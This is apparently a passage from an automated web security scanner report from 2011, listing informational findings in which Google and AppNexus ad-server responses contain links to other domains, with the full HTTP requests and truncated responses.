Content-Length: 7222

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-ghdb-cross-site-scripting-example-poc-report-kroogycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dwww.provinetsolutions.com%26adT%3DManaged%2BInternet%2BChicago%26adU%3Dwww.ntsource.com/%26adT%3DChicago%2BDedicated%2BHosting%26gl%3DUS&amp;usg=AFQjCNEXF-Nj4Xr4BOzrkMZT5S3MpR_O3A" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...

23.457. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679565&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661565002&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303661565004&frm=1&adk=2614322350&ga_vid=739157137.1303661565&ga_sid=1303661565&ga_hid=1921964683&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=4 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:12:42 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3DAmazon_Kindle.BigDeal.com%26adT%3DKindles%2BBlowout%2B-%2B93%2525%2BOff%26adU%3Dwww.Fool.com%26adT%3DMotley%2BFool%2BStock%2BAdvisor%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26gl%3DUS&amp;usg=AFQjCNHUhPFUsgU6Qh_0ZQf2_DN3PESOZQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.458. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680099&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662099489&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662099494&frm=1&adk=2614322350&ga_vid=2082863330.1303662099&ga_sid=1303662099&ga_hid=1219390830&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:21:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.AmazonServices.com/ProductAds%26adT%3DAmazon%2BProduct%2BAds%26adU%3Dwww.TrueShip.com%26adT%3DReadyShipper%2BFree%2BTrial%26adU%3DDealfind.com/Chicago%26adT%3DChicago%2B1-Day%2BCoupons%26gl%3DUS&amp;usg=AFQjCNFAXwAnB6TAr6L_3Td2sHf2ALlfFQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.459. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676422&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658422794&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658422802&frm=1&adk=2614322350&ga_vid=1769074993.1303658423&ga_sid=1303658423&ga_hid=1301346497&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1371

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDNGQjMwMDBDNUE5MjBBRTU4MzA4MUY2QjcxOTl8R0ZqRXJKdHl0MHwxMzAzNjU4NDIxODU1fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUwMTk3&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_swAMWpIK5YMIH2txmb8GB__on5K2_4iSvA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjMwMDBDNUE5MjBBRTU4MzA4MUY2QjcxOTk&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=150&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.460. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680148&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662148815&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303662148823&frm=1&adk=2614322350&ga_vid=1946590759.1303662149&ga_sid=1303662149&ga_hid=1338675840&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=11 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:22:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14442

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DTourism%2B-%2BAmazonia%26adU%3Dwww.Booksurge.com%26adT%3DPublish%2Bamazon%26adU%3DQuiBids.com/Auctions%26adT%3DKindle%25E2%2584%25A2%2BJust%2BSold,%2B%252442.13%26adU%3DECKOHousePublishing.com%26adT%3DSell%2BYour%2BBook%2Bon%2BAmazon%26gl%3DUS&amp;usg=AFQjCNEFd6_cOBfH29Pr5MHJL136dfE4Dg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.461. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ab?enc=UbgehetRD0BSuB6F61EPQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAmx_UNQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303647972%29%3Buf%28%27c%27%2C+47580%2C+1303647972%29%3Buf%28%27r%27%2C+173254%2C+1303647972%29%3Bppv%288991%2C+%272648761091995253405%27%2C+1303647972%2C+1303691172%2C+47580%2C+25553%29%3B&cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQW5AAFuF0K5TsMlgwlG6ulJHSvXriXqLC8qA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^gvuV^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM#DUE%oZDSFs[C#jT6#4fpHXSw^4MSkbcW^kJHs5vG[(l?%GK2v+wIbLRbZpJZPWPCtBpj(f-%Uqi+C`pFa#KCPN5<uj90t1PzS3+VX?C

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Khs:Q'WOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9`o?G(j89; path=/; expires=Sat, 23-Jul-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 24 Apr 2011 12:29:23 GMT
Content-Length: 1505

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAA
...[SNIP]...
</noscript>');document.write('<img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>');

23.462. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAgUCAAQAAAAAFiXDZgAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658466%29%3Buf%28%27c%27%2C+43438%2C+1303658466%29%3Buf%28%27r%27%2C+158848%2C+1303658466%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3B&cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676469&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658469201&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658469206&frm=1&adk=2614322350&ga_vid=1759932487.1303658469&ga_sid=1303658469&ga_hid=1147935042&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=22
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-K=VD1J`$[>KlFc@Mo]+N*fR)k>6'(p:XYXe81kw^+BCE9DeH3Vr#[[wG<k[?>d5frZ[bmm@Hq+gu@S75fBd-nWu!@>uzM?$SX.oJhK9eg2Xe?*pq8%TuDe)_1Y3qRhU>:L>>!Dl)nbWNb@GAx5bApcUu?x9N(/!a80.'OgN@$^j-uVt'v0`4hVA[Pc!T.fp1S9]vC?cG'u^t9aoHv_s`iqV84#d1siY/3qy.k>TVDhm3(sba]ASs@x4l@C?1VF^7@J; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 15:21:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 15:21:08 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 15:21:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-K=VD1J`$[>KlFc@Mo]+N*fR)k>6'(p:XYXe81kw^+BCE9DeH3Vr#[[wG<k[?>d5frZ[bmm@Hq+gu@S75fBd-nWu!@>uzM?$SX.oJhK9eg2Xe?*pq8%TuDe)_1Y3qRhU>:L>>!Dl)nbWNb@GAx5bApcUu?x9N(/!a80.'OgN@$^j-uVt'v0`4hVA[Pc!T.fp1S9]vC?cG'u^t9aoHv_s`iqV84#d1siY/3qy.k>TVDhm3(sba]ASs@x4l@C?1VF^7@J; path=/; expires=Sat, 23-Jul-2011 15:21:08 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 24 Apr 2011 15:21:08 GMT
Content-Length: 3578

<iframe src="http://view.atdmt.com/DEN/iview/289793864/direct/011303658466?click=http://ib.adnxs.com/click/mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAQUCAAQAAAAAFSWyZgAAAAA./cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adu